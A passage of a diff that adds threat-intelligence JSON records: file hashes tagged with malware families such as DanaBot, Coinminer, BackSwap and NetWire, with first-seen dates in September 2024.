"8f804cb90df58d4600f50daac51fa2b19e99675676147fd124a30d6a6b5075b5" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a77c449b912b5f38e7a243d1ae016c72ae891a5b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643643132, + "hash": [ + "be125dda8f481730eb1c3c74b7bd8194", + "9d4b9ef5bd4f3054d9ed758218522683f8e55dd0", + "eeeed38b3f7afaef616bd4d19e63581c982a0d88abf6d9e50a28f2c998088cf0" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a89673bd35ebb765f32b11fbff61dec6e421b6a5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643646691, + "hash": [ + "c74d3c1eafc08e8508ec2e703ac9f857", + "a2c7bc967bb1337cd73e204b6e46c61251b77684", + "d3295324be92a53570980f23a08b5c8cdcc8045c2240075c94c44cd045042c51" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0f35d93e9baefa66722cd97eadb16781384d3048", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643904813, + "hash": [ + "1b0c2d942d5020106c4cb4eff1b77273", + "be0d82548a8e701e8693e7bd382969392f0ca093", + "9aa86eb7297a723e49dcd9bd91db21338902ef39f957e776e1b9bfd1279c642b" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8c12b7b9cd928b4c5611bb4abeedce7ba9519ea0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643907283, + "hash": [ + "1b96cd66c844f1aa37b3e52cda27585a", + "ddff2e432f6196611d82a02d650039a5de6ba26e", + "3702b5813c5c6966e7caf64b7579f844298acdb5005a5cd9a46a4188e8db9034" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "dac71c12c3ccf23e06bd9f1d7a49a0981095adc9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643909847, + "hash": [ + "65e534d2434340f6c491dafbf6517d6c", + "e4807e55870dedc767eae94ba435eaf0a69bd489", + "27fa51e57d4513601e36b0dc90332c86de7d31579db13c8b75f0152ab5fcaa2d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4b7d93bb9c2e54b9df5d9c83fd9c942727929d44", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643912373, + "hash": [ + "65e534d2434340f6c491dafbf6517d6c", + "e4807e55870dedc767eae94ba435eaf0a69bd489", + "27fa51e57d4513601e36b0dc90332c86de7d31579db13c8b75f0152ab5fcaa2d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4f5e30e14c9ca9953fd61b9c8016f28e93c4c5de", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274643916173, + "hash": [ + "d9f24170f5d03dfcdb77192e3934d6db", + "f3f64aae0b2a7ea3b393b33e2fcd25cb50373dcf", + "9a5f2da8b11a2dba70ac20c7f4fe264d3a34df6081feac133e1d900670006eef" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "eb2214b4dae831db6901580b076b7a9a6733bc94", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644048977, + "hash": [ + "2ed25fbe2922da02cb5ea619c6494266", + "f6742c708fce38406a9d0152bf9b639da7024343", + "8977377d9b4a976d8dcd22338b6308c4eaf6d7542466fa5acbaa970cff484ac7" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fce5ec09dc95bb27468d536bc48ef6d6cb17f6c9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644052017, + "hash": [ + "4eb5f0766d4b7179a33ffbf598b8d443", + "fc96831b79c470fcc02f6a1677a64a0040ee6a6a", + "007169d5b7cdf388af9d58ed54c9ccc290037da47956d2e57718523e69bd5cda" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5a2ac17ac283e44d7740fa4df51d2d14c9a75cd6", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644055120, + "hash": [ + "4a27e976e12e7ffc66798c7de87e60bb", + "085a39f8ae9cf6d8150176a6b445d7f43fd3697b", + "cc85d2a696717f0ea37bb51458961bde83eaebadff34bdb576bf11bb63434f13" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "07e1cdb9e3a9c66a6abcb53ee3f0b63bfc09fe77", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644058767, + "hash": [ + "06dc238fc0d3598fca719d929ee02bf4", + "0fcb8b738eda986af9774872976e8be947c3b02d", + "515d2153a1bdf3d783f117e6c2633d6f0687a2e2caa1d8c5323fc4e1ecbaeee9" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7c6aeaeb4ec45733532c31f08c4e0cdf737ac48b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644061923, + "hash": [ + "43fbb9cb68e9e779712b5beebf73e749", + "3e9229778fcc1ad37d75a796de1cf4aae440529e", + "63e54f716fa95e20c7f15f108df655d235070c92534917037cd12647ec2ce083" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7aec53f6e9b3f95d89d81d20720ce8e24e82485e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644064493, + "hash": [ + "7ca0cb117471c0ef4e07ebb3b23db3b8", + "527917b218b2d6cdb40a22f10402fb622de063bf", + "419591d05d3e998875b77999e901b07b1120f672fb0d47e6d27280b9224831f2" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "115c8a33a5d7d88cd4536dfe4aed551c659013ae", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644067080, + "hash": [ + "a34578cc7e6829f962415c8924719c2a", + "5f10cac3af3ed3484e72eab41878a6c36013e109", + "7f0ea28a27ab5d069b46be30927964b552bf5fe8c52691dffde16b73fb85984c" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "90461f056c30f8fab68f6b76992df7b6e05aef39", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644071423, + "hash": [ + "b311ee1d17da1212510688d69ecf2b84", + "6fc9edda87f81e524bb84b6508115fa726d7785a", + "ce7d7709dde4b110c0f09e21c9da52767322840ff4029915bc0a09480c4997de" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7560d0d9a63e1d92ef615a37022c0a6be12bb59a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644074095, + "hash": [ + "e89b3dfac52ed3ce05a4ec0166d38d3a", + "905bb4fb712763851ba5e96f3d8a18cf4ba40f89", + "7466b99f1eff37fdb736a2c056edf7566bec1f65484489a986a4cfe6bbfd3fd3" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a4a6318777102242378556458704d9a3caa40074", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644290372, + "hash": [ + "1d2ae2a538be0963296aa3bc1654c9f7", + "9635975a6234cf60133f81715d32d265cad74ee7", + "c97e52ce527b0287a9813598c93afc1cdccb259303481095720cbb5897164d4f" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "010e81511d4a15a0b7b93e9ba43864e70ab65868", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274644785479, + "hash": [ + "1387a4865ad79b1e666e992b5a809860", + "c22d39a59d13b72063567a36a56a8b9e3c963c64", + "a97c5e02637dab419a3417aed3da9ff4be5881af4b399857be138bd2647eae63" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "e309919d961474d42b6dd0156f6e7ccb9a85bb44", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274650222668, + "hash": [ + "c6dafa401c07b0fda4bf890bd0fa0e80", + "66ee1fca0dcaa099d9be78103ebfc8ff2ff2e12c", + "c837a3801080549d4435929bbdcfddb4847dec3e1ddff0665c7ed99fbcb5643b" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "095f6ca254ea4d46e07527c1b8564abf393e5c80", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274650225985, + "hash": [ + "b78b017b533d08d86def95316aea1766", + "86f7b6c5ce87f066f8a81c9f0268823368a0edcc", + "bc32158d54fdb8c6f18ba62512b1881003b4d10dc96ecf112c19e56f6178bfda" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "af1ceed3447320d020cce88e05cd48b96fe76c21", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274652795041, + "hash": [ + "944830c2d331b1be3c53d8bfc6f59d5d", + "ac4bc0aa95b1729a329cb1aef3fd2b671fa5d0d9", + "cd14308af8c56e0e962c711d6c8d9b55e1ed28454c851042dc4c6ada990df52b" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "5cba39cd1c952fbe58103c54683cda7c63a8dc19", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274663568107, + "hash": [ + "ef2c8872874e15901864487a5a25da24", + "b805fd7203f7fc21ca6adb72fe7d25d668735615", + "a3cd1c4fdd7d10c9d96ab4322e4615e3cd5f1feeaf30a89a38e0938a12c68445" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "8ce675906334b63a0d69c68863d4be76ef53cf85", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274673235205, + "hash": [ + "9d4e1c7cd2f742ad1fbba19401a25906", + "c3f82cec573abc3f440c94da4126bfd3cd82c291", + "67ae071b960d2f5e8692632574dd372afb0c5634cff09472d10ce748a60311cd" + ], + "malwareList": [ + { + "name": "", + "aliases": null + }, + { + "name": "BackSwap", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8363280b2df5e805c35e104cfc9a4a427bcfbea9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274674677018, + "hash": [ + "d5942dadec87ce2a7da59abb81b06ed5", + "94a57ea5b8ab26614e598b33bd9462365f4462bb", + "0a5544643a042d7d1a580e8fbd430a1ae3f8f9cc6d25db9bf71d308a108cfaa6" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dabe6b8349d4b939082e7b9a3c763fca1128cdd4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274674680430, + "hash": [ + "421cbfd63acb98479472651c9c321d62", + "aebbed555234a21a22a66e98e89fbea0f2300420", + "67e408979b0b0f86b4b3c9a3e17885cad82c142e2a25e42f87a2e1c67e13c88b" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "82f8cac7f94a4edaaa2fcb3eef9f9ceb2fdc5aa9", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274675640931, + "hash": [ + "bd335578c74493fff1830699f7100af4", + "aea937fde12d918f60deb0139b0ef5ac06b47ab6", + "5d42c928b2e64bfaa9184e2097e138df129c7d17ad1117dd771d49b80ba945cd" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7abf094c86279d0a22ae93dc742efdb522962bdf", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274675645000, + "hash": [ + "b36b729f05b0980407233d32acda3b96", + "b96297b59ac3e72b0d9284c25fc997345d08adb6", + "41292aad5c12b1b254babb6d69ba51fdcb91816779d2a9e50190853ef40cd1e3" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "013f704bb19dcc69483a7f67788c8ae1c0ad1bb1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274677771468, + "hash": [ + "31b3e1b0f7a773ffa66eaef725dfd0c1", + "af58dad95b52564838897b3f329d834cf76651b9", + "e76fed049a31caf18a22d655ab6dc46d59f9fe1639728a042c832a20489deedd" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a94c086d61952b9420e1658055fafd61c8f871d8", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274677774874, + "hash": [ + "983f4ccc7fdfc0f641230c4a3617ac94", + "b87336c1200cf5c5b7dc46753e0f6c4a87e70746", + "32ddb5078bf2a053e8c291851cc5e2b0fa4cb04a1c974fd3ef03fcf84bafd169" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1b81d8da29b3cd7ea32fc6dd15b3c8e1ee4836ac", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274678752053, + "hash": [ + "6393e5803edd2a8ee5b216b0c61c89c3", + "d495af36e909d20a14ee02c3cf69b147d2a13958", + "07033841c5288a92001918790242e4f2708bacb07822017cd69f1b6dbcc3874d" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "76b1383c1bb277aed99fbe03be22ad2fca25b35c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274678755432, + "hash": [ + "7b48480a5f36ec6fdc3740eea1e9b382", + "d4e8535942cbaf71d40483479d954ff0e4d4933f", + "f665a4f0ccbf9ce17858b085467a87c472723c5d26b2ac8b3e4132ec6930ded3" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "799bd51260d47000713ad97054547ebddb55cf09", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274680406918, + "hash": [ + "21c34d64028e24de69b08eba225d3323", + "a0ece05f2d5ea850a4b2c93c31581b275815e763", + "47c1641f42dfbc84a6e22c07b0f2ec0a0d26f3b904fbac3005bac89c6362b45d" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "4374da2c8b40a0c6e825df8010162170518427ed", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274680693101, + "hash": [ + "cacf78f42e19d6253351e97842d815da", + "cd5b4e5564b16e91ca953e18702d5d089d573c4f", + "65b7cbf713e40a472d2fae2beea89ccf9d1b31c23928bf40600654fbf216ef11" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "621f321a9b1f8755264ad9a366c094dfaa89a530", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274687310753, + "hash": [ + "55dda052fbe1631f21a0d960ba1e7535", + "b99301284f655c18cb023847465ea1b30d4041e2", + "64046fc124ccf3acd90331ad17dd3c78672c1003124abc76a89d61744e640757" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "ec4626f34d5f10e49685c6fc536ff0b6d61a1415", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691364020, + "hash": [ + "111c77651b999cb8b61a65483e743126", + "a6160f9481fc2cb81a71f43b64d10db41413d251", + "5dbda4c9e0a29dcc4c3b377d82f4df7f17c45f7f928b45cfb6eff96ed55d094d" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "dd2a00b5ebf49a29023fb9ce014a1a68349e6f1e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691366369, + "hash": [ + "a62f723dfa9846801519eb3596731cda", + "be1e34be87bc82b24aba12943bfc196ec9a7f5b5", + "607abff8bf50dac93b61bfca2d6d2b5e90701dbd4153ef07fdd7e88dd474f160" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a51479bf23d021444098eceeb39968b8fa6cc7ca", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691369156, + "hash": [ + "5ece0b9eccbe6e9c5e4ce0953fe3dc04", + "ca4cc3e3f2dbe962e848dd726958de5d82a7901b", + "6ac7892cd51aa473833094a375d56844692ee5bb3503ccb9153cea41e71fb8d2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "25ba451591b7e8d43093e3cce013ff4add5a5abc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691373358, + "hash": [ + "d119153e4ed770aff06344f768220611", + "d371b911a2a1585608d8d8d3b1642c3d370b9fd9", + "6d669105c46924a88835c85e5fa75fafe0c2378799892806581209551bc1f802" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "79c267acd57f24cff2ef319aa99f34bde60e2de5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691376175, + "hash": [ + "aad63f75c48b423bc8df166ed39e3391", + "e5d65e9621365229d3acceda74acab0ab72199e1", + "710101e1c0bcdc483980ddb6e3a77949de4dab29f92feccbf0cbfb15f59f7b78" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "40ad55faa6539ab871d58786beea6d5ce79692de", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691590139, + "hash": [ + "f3b531db9a29f4322f37510e55025c16", + "c499170f65a8f5a804cd436b77af8bb4cb818a55", + "654cd93d7515a801325e53d21a33654d2df8b0bad33e58405f60e36c62cfa9ff" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1f12a450ad3841f0d23892072a6c079d79b23ee4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274691860831, + "hash": [ + "d8058c19f51a7a07222a851d9a6da442", + "ea406d30d1513e60e17fb4ca982f86de23ec3e43", + "2508e1cd4e6301b25b3168b0859688a96c13a2beb1d8c7012507621a403d4085" + ], + "malwareList": [ + { + "name": "BackSwap", + "aliases": [] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "fe789353c290215de173d528fc04920b7ad201a7", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274694645874, + "hash": [ + "8166ddbdcaca22fb649637fdafdc76a9", + "d87e6765b73ae22d72adb41427246122d3b09a59", + "b9c4cb604d43c58b9846c8f56b27d3b9feea37a65ed312f40257e713aa8f4381" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "cf3505370ea5e49bc26e1acc50b512064d80ab30", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274696976816, + "hash": [ + "7b09a23048a7995bf7cbc6bd6b5ff104", + "b10a84db22def67c779da2bd76f7a23195c9e63e", + "be5f115e88747af9ef63eac58628f8bf953de3f4f1525f4e05bc59124bf93c9b" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4eec4a5e4953e04a3595d167f6d70c4f64f9c472", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274696980477, + "hash": [ + "6bbe0330b342125fef584e68b49191e1", + "b7acc400bebd50ba6cef4e4f01d923ed53de3802", + "d1793e7499a6314d8bdb9554d5a7138c38cf55e5350615b711858f250d4da049" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b1ad47b004b6176941d040a148801520cc1cc51a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274696983051, + "hash": [ + "9fab1f8f56d24af0e366e3e24927e4fb", + "baafa33897c13ab34e3065437fc1e311056049a7", + "6d149f4d86782ef6a6523d2da3b34f3168c04a0ace360449c46d84908f95ccf0" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4c9219936f69590cb779079e40048f1485ada8de", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274696986723, + "hash": [ + "11b8443bb27a671c0fe7b7bd176f205a", + "cea9fb3e370f50ddc41a1dee7a55d80c9358c1e7", + "4ca951e9d3fcc4196ad777f1f908cf2857e6ed55a7d72d7b0f6636a6b522fe7e" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "9edee56ede504549fbe968d4e5384e160e6ca20a", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697238654, + "hash": [ + "0efcb1b188307bf17a54ef50ca8155ab", + "d772a8583c714eca36c3484c6622145162b58f5e", + "35006849923a746ec05e088ad823de548fb3bb1d36033d8e91016d88b04c5cdd" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7662665b1ceec902c12d3e993f2720e271e53a78", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697241198, + "hash": [ + "af53ec89f1f89539980897a278d516f4", + "daa4a6348ebc278daf3e6f3d99a49de08bac69ae", + "2039e9469fb9cbea1c6dd04877b9c4e8a9047fba93e04206081859c0fa8eed9d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6dd69f3e1c8e563f393c7c4d93027b3b019bf33e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697244919, + "hash": [ + "83bea8e506e073d1650f49b3c6139714", + "dac57f0a8749219a0eaceca53131809e42c20e25", + "7423d16a3b849bcd3ae6492272a45aaff2f7d681d20366d99bc29dc2ea392145" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f1fbeea285e2bdacecaa1c6cb0f80998b9f52b77", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697370461, + "hash": [ + "f03314a9bf460d3c213f38683f04da34", + "e2dad0af4ab8adc3426517bbaf11b5b1712215e2", + "7c84cc486f2253da342b3d482f356b8bbe568a1eb4723a0a8b6e43fdf427b88b" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ebc9c02c21f03b88662eb13887fe1ee25eb7266e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697372765, + "hash": [ + "bde6f9af55222f11527b0fe14f27c720", + "e9855813728294238d6f455ca63c012bee655c72", + "5d0de96731c89218ec52a61e94bf3181e5e3c76889b59bce92aba3a5716e286d" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "df686f53251b940515b1755819b7449e530ab9f4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697375563, + "hash": [ + "c724049dd4724eb4c1f85e6569d2e36e", + "f0dadc0d4e8d015bd8b360f6800249eb42693dd3", + "a4e7cf6c9373d4c935febdda04d0074687cf01691869751094f4e336a9d4b96e" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "31c3eaca89c01b44b8809aa1b8931079486fa049", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697378810, + "hash": [ + "d03798b089c5b61d7ee681cedc55f9bf", + "f16a4b77879e4ae8b9c76e22766cebaed551d897", + "0072bdea55b0e4b08cf18e8a39ac06b1a3bfebd2ea4d41768ab311945c5315ee" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "31743bc7ec1f3b79be2f516767baa96a40d83864", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697381802, + "hash": [ + "ced6453d952d2ef318594a1041dfb6f9", + "f1739ab3e6ebfbe583e036d923cb1236430a8713", + "2181af8eff5f9d4ee0d910f6558afbb4cd3e86cb4965ccc966a7cf8645a0d4ca" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "edec04c9bbe7064d7711a608fe205f431a82acb0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274697433653, + "hash": [ + "0ceac1c19df1ed5c4494ca0e065459df", + "edd3308a1e430ceafd184280c628cc499ab13334", + "67a0b5fb8d7f50e42423306a6c88b0faac40eeb9c5f332484fec59badd24cd03" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cca4a48309a0cd1b26debd61bbbb417c57ea9a4b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + 